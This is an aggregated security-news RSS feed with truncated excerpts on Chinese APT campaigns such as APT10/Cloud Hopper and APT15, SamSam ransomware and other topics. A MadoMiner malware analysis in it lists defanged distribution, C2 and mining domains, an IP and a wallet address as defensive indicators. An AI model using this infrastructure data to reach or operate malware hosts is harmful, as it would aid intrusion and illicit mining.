This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-05-23T20:11:07+00:00 www.secnews.physaphae.fr InformationSecurityBuzzNews - Site de News Securite APT10 Targeted Norwegian MSP And US Companies In Sustained Cyber Attack]]> 2019-02-11T21:30:02+00:00 https://www.informationsecuritybuzz.com/expert-comments/apt10-targeted-norwegian/ www.secnews.physaphae.fr/article.php?IdArticle=1023008 False None APT 10 None ZD Net - Magazine Info 2019-02-06T15:01:00+00:00 https://www.zdnet.com/article/china-hacked-norways-visma-cloud-software-provider/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=1020001 False None APT 10 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Threat Actors That Don’t Discriminate  When it comes to threat actors and the malware variants they use, let’s talk dating — or rather, the way people date — because one could argue there are marked similarities between the two. You see, there are criminal groups who have a “type,” i.e. using malware that targets specific industries or even organizations — say, financial services (ever-popular and oh-so debonair) or perhaps critical infrastructure (spicy and daring!), or even healthcare for those who prefer staid and demure. Yet other groups are the free lovin’ types who go after multiple sectors using many different malware variants and approaches to accomplish their goal — no discriminating with this bunch. Let’s look at one such example, APT10 / Cloud Hopper, which is likely the group behind a long running, sophisticated campaign that uses multiple malware variants to target many different sectors in many different countries. You can check out some of the pulses relating to APT10 / Cloud Hopper on the Open Threat Exchange (OTX). The U.S. National Cybersecurity and Communications Integration Center (NCCIC) reports the campaign started in May 2016, and NCCIC last updated its alert in December 2018 — so it’s not going away yet. The group known as APT10 / Cloud Hopper has hit quite a few victims over the last few years in many different sectors, such as: information technology, energy, healthcare and public health, communications, and critical manufacturing. However, their “date of choice” seems to be MSSPs due to the fact a that credential compromises within those networks could potentially be leveraged to access customer environments. From OTX pulse “Operation Cloud Hopper”: The espionage campaign has targeted managed IT service providers (MSSPs), allowing the APT10 group unprecedented potential access to the intellectual property and sensitive data of those MSSPs and their clients globally. This indirect approach of reaching many through only a few targets demonstrates a new level of maturity in cyber espionage – so it’s more important than ever to have a comprehensive view of all the threats your organization might be exposed to, either directly or through your supply chain. As any clever serial dater would do, APT10 / Cloud Hopper doesn’t use just one approach. The NCCIC reports they have deployed multiple malware families and variants, some of which are currently not detected by anti-virus signatures — for example, PLUGX / SOGU and REDLEAVES. And although the observed malware is based on existing malware code, APT10 / Cloud Hopper modifies it to improve effectiveness and avoid detection by existing signatures. How Can APT10 Group Impact You? If these free lovin’ bad guys decide to come after you, they’re likely looking for your data (perhaps to steal intellectual property). At a high level, they’re accomplishing this by leveraging stolen administrative credentials (local and domain) and certificates to place sophisticated malware implants on critical systems (such as PlugX and Redleaves). Depending on the defensive mitigations in place, they then gain full access to networks and data in a way that appears legitimate to existing your monitoring tools. Voila! They’ve gone from first date to a home run! Wired Maga]]> 2019-01-31T17:24:00+00:00 https://feeds.feedblitz.com/~/594984126/0/alienvault-blogs~APT-Group-Targets-Multiple-Sectors-But-Seems-to-Really-Love-MSSPs www.secnews.physaphae.fr/article.php?IdArticle=1017733 False Threat,Malware,Vulnerability APT 10 None Malwarebytes Labs - MalwarebytesLabs A roundup of last week's security news from January 14 to 20, including APT10, Fallout EK, Colllection 1 data, Youtube challenges, hosting malicious sites and a Fortnite security flaw. Categories: Security world Week in security Tags: APT10ArsTechnicaBleepingComputerCoinDeskcollection 1cryptopiacve-2019-0543DASFallout EKfortnitegarminGarmin watchhostingHTTPSoregonpowershellPowerShell Team BlogSC Mediashutdowntelegramthreadxyoutube (Read more...) ]]> 2019-01-21T16:48:03+00:00 https://blog.malwarebytes.com/security-world/2019/01/week-security-january-14-20/ www.secnews.physaphae.fr/article.php?IdArticle=1002626 False None APT 10 None Malwarebytes Labs - MalwarebytesLabs While security companies are getting good at analyzing the tactics of nation-state threat actors, they still struggle with placing these actions in context and making solid risk assessments. So in this series, we're going to take a look at a few APT groups, and see how they fit into the larger threat landscape-starting with APT10. Categories: Cybercrime Hacking Tags: advanced persistent threatadvanced persistent threatsaerospaceAPTAPT10APTschinaChinese Ministry of State SecurityconstructionengineeringFireEyeMSSPlugXPoison Ivyscanboxsogutelecomsthreat actors (Read more...) ]]> 2019-01-16T17:00:00+00:00 https://blog.malwarebytes.com/cybercrime/2019/01/advanced-persistent-threat-files-apt10/ www.secnews.physaphae.fr/article.php?IdArticle=995575 False Threat APT 10 None Krebs on Security - Chercheur Américain 2019-01-16T00:52:03+00:00 https://krebsonsecurity.com/2019/01/stole-24-million-but-still-cant-keep-a-friend/ www.secnews.physaphae.fr/article.php?IdArticle=994420 False None APT 15 None taosecurity - Blog Sécurité Chinois This is not strictly an information security post, but the topic likely affects a decent proportion of my readership.Within the last few years I experienced a profound professional "burnout." I've privately mentioned this to colleagues in the industry, and heard similar stories or requests for advice on how to handle burnout.I want to share my story in the hopes that it helps others in the security scene, either by coping with existing burnout or preparing for a possible burnout.How did burnout manifest for me? It began with FireEye's acquisition of Mandiant, almost exactly five years ago. 2013 was a big year for Mandiant, starting with the APT1 report in early 2013 and concluding with the acquisition in December.The prospect of becoming part of a Silicon Valley software company initially seemed exciting, because we would presumably have greater resources to battle intruders. Soon, however, I found myself at odds with FireEye's culture and managerial habits, and I wondered what I was doing inside such a different company.(It's important to note that the appointment of Kevin Mandia as CEO in June 2016 began a cultural and managerial shift. I give Kevin and his lieutenants credit for helping transform the company since then. Kevin's appointment was too late for me, but I applaud the work he has done over the last few years.)Starting in late 2014 and progressing in 2015, I became less interested in security. I was aggravated every time I saw the same old topics arise in social or public media. I did not see the point of continuing to debate issues which were never solved. I was demoralized and frustrated.At this time I was also working on my PhD with King's College London. I had added this stress myself, but I felt like I could manage it. I had earned two major and two minor degrees in four years as an Air Force Academy cadet. Surely I could write a thesis!Late in 2015 I realized that I needed to balance the very cerebral art of information security with a more physical activity. I took a Krav Maga class the first week of January 2016. It was invigorating and I began a new blog, Rejoining the Tao, that month. I began to consider options outside of informations security.In early 2016 my wife began considering ways to rejoin the W-2 workforce, after having stayed home with our kids for 12 years. We discussed the possibility of me leaving my W-2 job and taking a primary role with the kids. By mid-2016 she had a new job and I was open to departing FireEye.By late 2016 I also realized that I was not cut out to be a PhD candidate. Although I had written several books, I did not have the right mindset or attitude to continue writing my thesis. After two years I quit my PhD program. This was the first time I had quit anything significant in my life, and it was the right decision for me. (The Churchill "never, never, never give up" speech is fine advice when defending your nation's existence, but it's stupid advice if you're not happy with the path you're following.)In March 2017 I posted Bejtlich Moves On, where I said I was leaving FireEye. I would offer security consulting in the short term, and would open a Krav Maga school in the long-term. This was my break with the security ]]> 2018-12-21T16:30:11+00:00 https://taosecurity.blogspot.com/2018/12/managing-burnout.html www.secnews.physaphae.fr/article.php?IdArticle=959069 False None APT 1 None SecurityWeek - Security News pointed the finger at China for sophisticated cyberattacks launched by a threat group known as APT10 against organizations around the world. The U.S. ]]> 2018-12-21T15:51:02+00:00 https://www.securityweek.com/industry-reactions-us-charging-apt10-hackers-feedback-friday www.secnews.physaphae.fr/article.php?IdArticle=960598 False Threat APT 10 None ZD Net - Magazine Info 2018-12-21T15:44:05+00:00 https://www.zdnet.com/article/five-other-countries-formally-accuse-china-of-apt10-hacking-spree/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=958707 False None APT 10 None Bleeping Computer - Magazine Américain 2018-12-21T09:55:03+00:00 https://www.bleepingcomputer.com/news/security/historic-apt10-cyber-espionage-group-breached-systems-in-over-12-countries/ www.secnews.physaphae.fr/article.php?IdArticle=958588 False None APT 10 None SecurityWeek - Security News 2018-12-21T07:24:01+00:00 https://www.securityweek.com/five-eyes-nations-blame-china-apt10-attacks www.secnews.physaphae.fr/article.php?IdArticle=958289 False Threat APT 10 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) ]]> 2018-12-20T23:45:03+00:00 https://thehackernews.com/2018/12/chinese-hacker-wanted-by-fbi.html www.secnews.physaphae.fr/article.php?IdArticle=958015 False None APT 10 None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2018-12-20T19:38:02+00:00 https://threatpost.com/china-duo-charged-spy-campaign/140227/ www.secnews.physaphae.fr/article.php?IdArticle=957261 False None APT 10 None ZD Net - Magazine Info 2018-12-20T16:38:00+00:00 https://www.zdnet.com/article/us-charges-two-chinese-nationals-for-hacking-cloud-providers-nasa-the-us-navy/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=957052 False None APT 10 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC breach portal (as of November 30, 2018). This includes the likes of unauthorized access or disclosures of patient data, hacking, theft of data, data loss and more. Bottom line, if you’re tasked with protecting any entity operating in the healthcare sector, you’re likely experiencing some very sleepless nights — and may just need a doctor yourself. So . . . who’s wreaking all this havoc and how? According to AlienVault Labs, opportunistic ransomware is still a preferred method of attack. However, researchers are reporting a rise in the number of targeted ransomware attacks in the healthcare sector. These attacks are often backed by organized criminals who see opportunities for making money from healthcare providers and other similar entities who must protect and keep assets, systems, and networks continuously operating. One such criminal group operating the SamSam ransomware is thought to have earned more than $5 million dollars by manually compromising critical healthcare networks (see below for more info). The group behind SamSam has invested heavily in their operations (likely an organized crime syndicate) and has won the distinction of being the subjects of two FBI Alerts in 2018. And, according to AlienVault Labs, the methods used by SamSam are more akin to a targeted attack than typical opportunistic ransomware. SamSam attacks also seem to go in waves. One of the most notable was a spring 2018 hit on a large New York hospital which publicly declined to pay the attacker’s $44,000 ransomware demand. It took a month for the hospital’s IT system to be fully restored.   SamSam attackers are known to: Gain remote access through traditional attacks, such as JBoss exploits Deploy web-shells Connect to RDP over HTTP tunnels such as ReGeorg Run batch scripts to deploy the ransomware over machines SamSam isn’t going away either. AlienVault Labs has seen recent variants. You might want to read more about the threat actors behind SamSam, their methods of attacks, and recommendations for heading ]]> 2018-12-20T14:00:00+00:00 https://feeds.feedblitz.com/~/588421296/0/alienvault-blogs~Let%e2%80%99s-Chat-Healthcare-Threats-and-Who%e2%80%99s-Attacking www.secnews.physaphae.fr/article.php?IdArticle=956718 False Threat APT 23,APT 19,APT 18,Wannacry,APT 22 None ZD Net - Magazine Info 2018-10-30T00:08:00+00:00 https://www.zdnet.com/article/google-launches-recaptcha-v3-that-detects-bad-traffic-without-user-interaction/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=869675 False None APT 19 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC MadoMiner analysis, please do so now.  This analysis will pick up where Part 1 left off, while also including  a brief correction.  The x64 version of the Install module was listed as identical to the x86 Install module.  However, this is not correct.  The x64 Install module is identical in run-through to the 360Safe.exe module, which will be discussed later in this analysis. In addition, take care with this portion of the malware.  The batch script for Mask.exe, DemC.bat, appears to run if it detects any copies of itself during runtime, or if you run the x64 version of install on a 32 bit machine. Where Install.exe was in charge of infecting new victims with MadoMiner, it seems Mask.exe is where the real payoff lies.  Mask.exe utilizes XMRig miners in order to mine for XMR which it then sells for profit.  While madominer was earning $6,000 a month as of the last analysis, Around 10/14, MineXMR closed the old address due to botnet reports.  A new address has been identified at 47QrUBQ4ejMW5wrWXiKUyRcQCZszauGWg9c3SLkzFoBJi45M5yN6gVPjVxSUfjMq4u8vepEejdnxyRQcv4RuFGy25x67433, mining through minexmr.com again.  Currently, the hashrate is at 109Kh/s, and steadily rising. Also, around the time that the address changed, MadoMiner also became drastically different. Malware Analysis Where Install.exe only downloaded 1 file from a remote host, Mask.exe downloads two files.  In addition, the servers used to download the files are also different than Install.exe, increasing the proposed size of the botnet. Domains In addition to the 2 domains identified in part 1, a new domain has also been identified for a distribution server: http://d.honker[dot]info However, the domain is currently dead.  In addition, the mining server currently used is pool.minexmr[dot]com A C2 server(newly updated version): http://qq.honker[dot]info Previously identified distribution domains: http://da[dot]alibuf.com:3/ http://bmw[dot]hobuff.info:3/ Previously Identified IPs: 61.130.31.174 Previously identified mining servers: http://gle[dot]freebuf.info http://etc[dot]freebuf.info http://xmr[dot]freebuf.info http://xt[dot]freebuf.info http://boy[dot]freebuf.info http://liang[dot]alibuf.com http://dns[dot]alibuf.com http://x[dot]alibuf.com In addition, http://da[dot]alibuf.com:3, the main distribution server, seems to have been registered by bodfeo[at]hotmail.com in early October 2017. According to an analysis by Steve Butt of DomainTools, this email was linked to APT19/c0d0s0, however it was most likely due to domain reselling. Exploits During the execution]]> 2018-10-29T17:00:00+00:00 https://feeds.feedblitz.com/~/577320150/0/alienvault-blogs~MadoMiner-Part-Mask www.secnews.physaphae.fr/article.php?IdArticle=869226 False None APT 19 None InformationSecurityBuzzNews - Site de News Securite Oceansalt Cyberattack Wave Linked To Defunct Chinese APT Comment Crew]]> 2018-10-19T15:30:05+00:00 https://www.informationsecuritybuzz.com/expert-comments/oceansalt-cyberattack-wave/ www.secnews.physaphae.fr/article.php?IdArticle=855291 True Threat,Tool APT 32,APT 1 None Security Affairs - Blog Secu 2018-10-19T07:06:03+00:00 https://securityaffairs.co/wordpress/77228/apt/operation-oceansalt.html www.secnews.physaphae.fr/article.php?IdArticle=854509 False Threat,Malware APT 32,APT 1 None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2018-10-18T19:17:05+00:00 https://threatpost.com/new-apt-could-signal-reemergence-of-notorious-comment-crew/138440/ www.secnews.physaphae.fr/article.php?IdArticle=853971 False Malware APT 1 None Wired Threat Level - Security News 2018-10-18T04:01:00+00:00 https://www.wired.com/story/mysterious-return-of-years-old-chinese-malware-apt1 www.secnews.physaphae.fr/article.php?IdArticle=852846 False Malware APT 1 None ZD Net - Magazine Info 2018-10-18T04:01:00+00:00 https://www.zdnet.com/article/seasalt-cyberattack-wave-linked-to-chinese-apt-comment-crew/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=852815 False Malware APT 32,APT 1 None Bleeping Computer - Magazine Américain 2018-10-18T00:01:00+00:00 https://www.bleepingcomputer.com/news/security/new-reconnaissance-tool-uses-code-from-eight-year-old-comment-crew-implant/ www.secnews.physaphae.fr/article.php?IdArticle=853394 False Threat,Tool APT 1 None ZD Net - Magazine Info 2018-10-03T17:00:00+00:00 https://www.zdnet.com/article/dhs-aware-of-ongoing-apt-attacks-on-cloud-service-providers/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=830249 False None APT 10 None Zataz - Magazine Francais de secu Fuite de données corrigée pour Info Greffe est apparu en premier sur ZATAZ. ]]> 2018-09-23T14:33:04+00:00 https://www.zataz.com/fuite-de-donnees-corrigee-pour-info-greffe/ www.secnews.physaphae.fr/article.php?IdArticle=821188 False None APT 15 None Security Affairs - Blog Secu 2018-09-15T08:34:01+00:00 https://securityaffairs.co/wordpress/76204/breaking-news/apt10-japanese-media-sector.html www.secnews.physaphae.fr/article.php?IdArticle=809152 False None APT 10 None SecurityWeek - Security News 2018-09-14T17:23:01+00:00 https://www.securityweek.com/china-linked-apt10-hackers-update-attack-techniques www.secnews.physaphae.fr/article.php?IdArticle=814005 False Threat APT 10 None Mandiant - Blog Sécu de Mandiant ciblant les entités japonaises . Dans cette campagne, le groupe a envoyé des e-mails de phishing de lance contenant des documents malveillants qui ont conduit à l'installation de la porte dérobée Uppercut.Cette porte dérobée est bien connue dans la communauté de la sécurité comme Anel , et il venait en bêta ou en RC (candidat à la libération) jusqu'à récemment.Une partie de cet article de blog discutera du

---

Introduction In July 2018, FireEye devices detected and blocked what appears to be APT10 (Menupass) activity targeting the Japanese media sector. APT10 is a Chinese cyber espionage group that FireEye has tracked since 2009, and they have a history of targeting Japanese entities. In this campaign, the group sent spear phishing emails containing malicious documents that led to the installation of the UPPERCUT backdoor. This backdoor is well-known in the security community as ANEL, and it used to come in beta or RC (release candidate) until recently. Part of this blog post will discuss the]]> 2018-09-13T11:00:00+00:00 https://www.mandiant.com/resources/blog/apt10-targeting-japanese-corporations-using-updated-ttps www.secnews.physaphae.fr/article.php?IdArticle=8377731 False Technical APT 10,APT 10 4.0000000000000000 Security Affairs - Blog Secu 2018-09-10T18:59:03+00:00 https://securityaffairs.co/wordpress/76077/apt/luckymouse-apt-filtering-driver.html www.secnews.physaphae.fr/article.php?IdArticle=801937 False Threat APT 27,APT 1 3.0000000000000000 Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2018-09-03T12:49:03+00:00 https://threatpost.com/apt10-under-close-scrutiny-as-potential-chinese-ministry-of-state-security-contractor/137139/ www.secnews.physaphae.fr/article.php?IdArticle=795027 False Threat APT 10 None Krebs on Security - Chercheur Américain 2018-08-02T15:11:04+00:00 https://krebsonsecurity.com/2018/08/the-year-targeted-phishing-went-mainstream/ www.secnews.physaphae.fr/article.php?IdArticle=763823 False None APT 15 None TechRepublic - Security News US 2018-07-31T14:03:05+00:00 https://www.techrepublic.com/article/google-chrome-launches-on-daydream-headsets-could-make-enterprise-vr-training-a-reality/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=760505 False None APT 15 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC InfoSec Recruiting – Is the Industry Creating its own Drought? | Liquid Matrix GDPR Did you think that discussions around GDPR were over? You thought wrong. Want to avoid GDPR fines? Adjust your IT Procurement methods | HelpNetSecurity SEXTORTION SCAMS A clever new twist on an on extortion email scam includes a password the recipient previously used at a hacked website, to lend credence to claims that the sender has hacked the recipients computer / webcam and recorded embarrassing videos. Sextortion Scam Uses Recipient’s Hacked Passwords | Krebs on Security TESLA Elon Musk continues to make the headlines, sometimes for the right, and other times for the wrong reasons. But it's worth taking a look at the companies security. While there was the infamous emaila few weeks back where Musk pointed the finger of blame to a rogue employee, it's not the first case of cybersecurity gone wrong in the company. Tesla sued an oil-industry executive for impersonating Musk in an email. The tricksters goal was to undermine tesla's energy-efficient transportation. Here’s why Tesla has been sabotaged twice in two years — lax network security | Last Watchdog ]]> 2018-07-20T13:00:00+00:00 http://feeds.feedblitz.com/~/559727188/0/alienvault-blogs~Things-I-Hearted-this-Week-th-July www.secnews.physaphae.fr/article.php?IdArticle=747573 False None Tesla,APT 1 None CSO - CSO Daily Dashboard 4 deception tools deliver truer network security. | Get the latest from CSO by signing up for our newsletters. ]]]> 2018-06-27T06:14:00+00:00 https://www.csoonline.com/article/3284379/security/reduce-breach-risk-and-costs-with-security-resilience.html#tk.rss_all www.secnews.physaphae.fr/article.php?IdArticle=725495 False None APT 17 None taosecurity - Blog Sécurité Chinois Before reading the rest of this post, I suggest reading Mandiant/FireEye's statement Doing Our Part -- Without Hacking Back.I would like to add my own color to this situation.First, at no time when I worked for Mandiant or FireEye, or afterwards, was there ever a notion that we would hack into adversary systems. During my six year tenure, we were publicly and privately a "no hack back" company. I never heard anyone talk about hack back operations. No one ever intimated we had imagery of APT1 actors taken with their own laptop cameras. No one even said that would be a good idea.Second, I would never have testified or written, repeatedly, about our company's stance on not hacking back if I knew we secretly did otherwise. I have quit jobs because I had fundamental disagreements with company policy or practice. I worked for Mandiant from 2011 through the end of 2013, when FireEye acquired Mandiant, and stayed until last year (2017). I never considered quitting Mandiant or FireEye due to a disconnect between public statements and private conduct.Third, I was personally involved with briefings to the press, in public and in private, concerning the APT1 report. I provided the voiceover for a 5 minute YouTube video called APT1: Exposing One of China's Cyber Espionage Units. That video was one of the most sensitive, if not the most sensitive, aspects of releasing the report. We showed the world how we could intercept adversary communications and reconstruct it. There was internal debate about whether we should do that. We decided to cover the practice it in the report, as Christopher Glyer Tweeted:In none of these briefings to the press did we show pictures or video from adversary laptops. We did show the video that we published to YouTube.Fourth, I privately contacted former Mandiant personnel with whom I worked during the time of the APT1 report creation and distribution. Their reaction to Mr Sanger's allegations ranged from "I've never heard of that" to "completely false." I asked former Mandiant colleagues, like myself,]]> 2018-06-25T15:03:20+00:00 https://taosecurity.blogspot.com/2018/06/bejtlich-on-apt1-report-no-hack-back.html www.secnews.physaphae.fr/article.php?IdArticle=722517 False Hack APT 1 None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2018-06-19T21:58:03+00:00 https://threatpost.com/apt15-pokes-its-head-out-with-upgraded-miragefox-rat/132943/ www.secnews.physaphae.fr/article.php?IdArticle=713210 False None APT 15 None Security Affairs - Blog Secu 2018-06-18T12:41:02+00:00 https://securityaffairs.co/wordpress/73636/apt/apt15-miragefox-malware.html www.secnews.physaphae.fr/article.php?IdArticle=710278 False None APT 25,APT 15 None SecurityWeek - Security News 2018-06-18T04:38:03+00:00 https://www.securityweek.com/china-linked-apt15-develops-new-miragefox-malware www.secnews.physaphae.fr/article.php?IdArticle=712098 False None APT 15 None Security Affairs - Blog Secu 2018-06-14T06:23:04+00:00 https://securityaffairs.co/wordpress/73498/apt/emissary-panda-campaign.html www.secnews.physaphae.fr/article.php?IdArticle=703940 False None APT 27,APT 1 None Bleeping Computer - Magazine Américain 2018-05-05T12:13:02+00:00 https://www.bleepingcomputer.com/news/security/new-service-blocks-eu-users-so-companies-can-save-thousands-on-gdpr-compliance/ www.secnews.physaphae.fr/article.php?IdArticle=629274 False None APT 19 None Bleeping Computer - Magazine Américain 2018-05-03T14:35:04+00:00 https://www.bleepingcomputer.com/news/security/facebooks-phishing-detection-tool-now-recognizes-homograph-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=625181 False None APT 19 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC If you don’t already know what Pretty Good Privacy (PGP) is; you may have heard of PGP before, perhaps during a discussion on how to secure your communications, or perhaps in one of those how-to maintain privacy guides. PGP is a popular solution for encrypting, decrypting, signing, and verifying messages and files, often found in email communications and package repository identity verification (because security matters). Most generic guides simply explain PGP at a high-level or how to encrypt and decrypt messages using specific software, and not much more than that. The goal of this introduction to PGP is to illustrate a more timeless and operational approach to using PGP safely, with respect to both information security and operational security. Firstly, we introduce PGP theoretically and practically, this means understanding how PGP works and what we can actually do with PGP. To better understand our security stance, we assess the CIA Triad, a theoretical Information Security model, that considers the confidentiality, integrity, and availability of information. Next, we get familiar with our threat model (similar to OPSEC Model); in this step, we analyze personalized risks and threats. To mitigate any identified threats and reduce risk, we implement operational security practices. At a more concise glance, we will discuss the following: PGP, OpenPGP & GPG Public & Private Key Pairs Information Security (CIA Triad) Confidentiality: message encryption, information storage Integrity: message/file authenticity, web of trust Availability: key servers, web of trust, metadata Assessing Threats & Risk Threat Modeling Operational Security Clients & Use Guides: Windows, Linux, Mac, Web With that caveat in mind, let’s jump straight in. PGP, OpenPGP & GPG: What is it? PGP is a protocol used for encrypting, decrypting and signing messages or files using a key pair. PGP is primarily used for encrypting communications at the Application layer, typically used for one-on-one encrypted messaging. You may find yourself needing to use PGP if you want to be certain that only the intended receiver can access your private message, thwarting the efforts of intercepting parties, or if you just want to verify the sender’s identity. There are different variations of PGP: OpenPGP, PGP and GPG, but they generally all do the same thing. Here is the quick terminology run-down: PGP: Pretty Good Privacy, original proprietary protocol. Released in 1991. OpenPGP: Pretty Good Privacy, but it is an open-source version, and it has become the universally-accepted PGP standard. Released in 1997. GPG: GNU Privacy Guard, another popular solution that follows OpenPGP standards. Released in 1999. When someone says PGP, it is generally s]]> 2018-03-26T13:00:00+00:00 http://feeds.feedblitz.com/~/535192976/0/alienvault-blogs~Explain-PGP-Encryption-An-Operational-Introduction www.secnews.physaphae.fr/article.php?IdArticle=542673 False None APT 15 None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2018-03-13T16:16:02+00:00 https://threatpost.com/china-linked-apt15-used-myriad-of-new-tools-to-hack-uk-government-contractor/130376/ www.secnews.physaphae.fr/article.php?IdArticle=510990 False None APT 15 None Security Affairs - Blog Secu 2018-03-12T18:07:04+00:00 http://securityaffairs.co/wordpress/70140/hacking/apt15-uk-gov-contractor.html www.secnews.physaphae.fr/article.php?IdArticle=508870 False None APT 15 None Bleeping Computer - Magazine Américain 2018-03-02T05:51:02+00:00 https://www.bleepingcomputer.com/news/security/new-tools-make-checking-for-leaked-passwords-a-lot-easier/ www.secnews.physaphae.fr/article.php?IdArticle=494453 False None APT 19 None NoticeBored - Experienced IT Security professional That's it, we're done! The 2018 malware awareness module is on its way to NoticeBored subscribers, infecting customers with ... our passion for the topic.There are 28 different types of awareness and training material, in three parallel streams as always: Stream A: security awareness materials for staff/all employees [if !supportLists]-->1.      [endif]-->Train-the-trainer guide on malware MS Word document [if gte vml 1]> ]]> 2018-02-28T21:54:40+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/lGwDU0lQ3UU/nblog-march-1-invasion-of-cryptominers.html www.secnews.physaphae.fr/article.php?IdArticle=492308 False Malware APT 15 None Zataz - Magazine Francais de secu Fuite des adresses mails des clients pour le site Info greffe est apparu en premier sur ZATAZ. ]]> 2018-02-18T18:58:01+00:00 https://www.zataz.com/fuite-de-donnees-site-info-greffe/ www.secnews.physaphae.fr/article.php?IdArticle=482789 False None APT 15 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Exact match domains (EMDs) used to be a thing (or still are, depending on who you talk to). You stuffed a few keywords into the domain before checkout to give yourself that extra edge to rank for cut-throat queries like “bestvitaminshop.com.” Domain age has also been rumored to influence rankings. Somehow, the older the domain and the longer you register it for tells Google… to like you more? Admittedly, the logic is flimsy. But Google originally debunked these myths in 2009, according to some digging by Matt McGee at Search Engine Land. First, they had a Google Webmaster Help forum thread where Googler, John Mueller, addressed this question head-on: “A bunch of TLDs do not publish expiration dates — how could we compare domains with expiration dates to domains without that information? It seems that would be pretty hard, and likely not worth the trouble. Even when we do have that data, what would it tell us when comparing sites that are otherwise equivalent? A year (the minimum duration, as far as I know) is pretty long in internet-time :-).” Next up, they had former Google PR chief, Matt Cutts, on the record several times addressing this issue: “To the best of my knowledge, no search engine has ever confirmed that they use length-of-registration as a factor in scoring. If a company is asserting that as a fact, that would be troubling.” So there you have it. “Officially,” domain registrations don’t affect SEO. At least, not directly. Recently, there’s some evidence that search engine result page (SERP) click-through rate (CTR) affects rankings. One experiment had a sizable group of people click on a random listing in the seventh position to see what (if any) changes occurred. And within just a few hours? Straight to the top. (image source) The finding shows an odd correlation between SERP performance and its influence on ranks. The point of this being that it is possible that a better domain name, one that’s more credible and interesting for people to click, could indirectly influence rankings. The industry standard .com domain is still seen as the most credible, even though new top-level domains (TLDs) continue to pop up and gain acceptance. Studies have backed this up, showing that .com domains generally dr]]> 2018-02-06T14:00:00+00:00 http://feeds.feedblitz.com/~/523389918/0/alienvault-blogs~Debunking-these-Domain-Name-Registration-Myths-Once-and-For-All www.secnews.physaphae.fr/article.php?IdArticle=465029 False None APT 19 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Part 1 focused on exploits and part 2 addressed malware. This part will discuss threat actors and patterns we have detected with OTX. Which threat actors should I be most concerned about? Which threat actors your organization should be most concerned about will vary greatly. A flower shop will have a very different threat profile from a defense contractor. Therefore below we’ve limited ourselves to some very high level trends of particular threat actors below- many of which may not be relevant to your organisation. Which threat actors are most active? The following graph describes the number of vendor reports for each threat actor over the past two years by quarter: For clarity, we have limited the graph to the five threat actors reported on most in OTX. This is useful as a very rough indication of which actors are particularly busy. Caveats There are a number of caveats to consider here. One news-worthy event against a single target may be reported in multiple vendor reports. Whereas a campaign against thousands of targets may be only represented by one report. Vendors are also more inclined to report on something that is “commercially interesting”. For example activity targeting banks in the United States is more likely to be reported than attacks targeting the Uyghur population in China. It’s also likely we missed some reports, particularly in the earlier days of OTX which may explain some of the increase in reports between 2016 and 2017. The global targeted threat landscape There are a number of suggested methods to classify the capability of different threat actors. Each have their problems however. For example – if a threat actor never deploys 0-day exploits do they lack the resources to develop them, or are they mature enough to avoid wasting resources unnecessarily? Below we have plotted out a graph of the threat actors most reported on in the last two years. We have excluded threat actors whose motivation is thought to be criminal, as that wouldn’t be an apples to apples comparison. Both the measure of their activity (the number of vendor reports) and the measure of their capability (a rough rule of thumb) are not scientific, but can provide some rough insights: A rough chart of the activity and capability of notable threat actors in the last year Perhaps most notable here is which threat actors are not listed here. Some, such as APT1 and Equation Group, seem to have disappeared under their existing formation following from very public reporting. It seems unlikely groups which likely employ thousands of people such as those have disappeared completely. The lack of such reporting is more likely a result of significantly changed tactics and identification following their outing. Others remain visibly active, but not enough to make our chart of “worst offenders”. A review of the most reported on threat actors The threat actor referenced i]]> 2018-01-30T13:40:00+00:00 http://feeds.feedblitz.com/~/521337082/0/alienvault-blogs~OTX-Trends-Part-Threat-Actors www.secnews.physaphae.fr/article.php?IdArticle=461917 False None APT 38,APT 10,APT 28,APT 3,APT 1,APT 34 None taosecurity - Blog Sécurité Chinois Last week I Tweeted the following on the 8th anniversary of Google's blog post about its compromise by Chinese threat actors:This intrusion made the term APT mainstream. I was the first to associate it with Aurora, in this post https://taosecurity.blogspot.com/2010/01/google-v-china.htmlMy first APT post was a careful reference in 2007, when we all feared being accused of "leaking classified" re China: https://taosecurity.blogspot.com/2007/10/air-force-cyberspace-report.htmlI should have added the term "publicly" to my original Tweet. There were consultants with years of APT experience involved in the Google incident response, and they recognized the work of APT17 at that company and others. Those consultants honored their NDAs and have stayed quiet.I wrote my original Tweet as a reminder that "APT" was not a popular, recognized term until the Google announcement on 12 January 2010. In my Google v China blog post I wrote:Welcome to the party, Google. You can use the term "advanced persistent threat" (APT) if you want to give this adversary its proper name.I also Tweeted a similar statement on the same day:This is horrifying: http://bit.ly/7x7vVW Google admits intellectual property theft from China; it's called Advanced Persistent Threat, GOOGI made the explicit link of China and APT because no one had done that publicly.This slide from a 2011 briefing I did in Hawaii captures a few historical points:The Google incident was a watershed, for reasons I blogged on 16 January 2010. I remember the SANS DFIR 2008 event as effectively "APTCon," but beyond Mandiant, Northrup Grumman, and NetWitness, no one was really talking publicly about the APT until after Google.As I noted in the July 2009 blog post, You Down With APT? (ugh):Aside from Northrup Grumman, Mandiant, and a few vendors (like NetWitness, one of the full capture vendors out 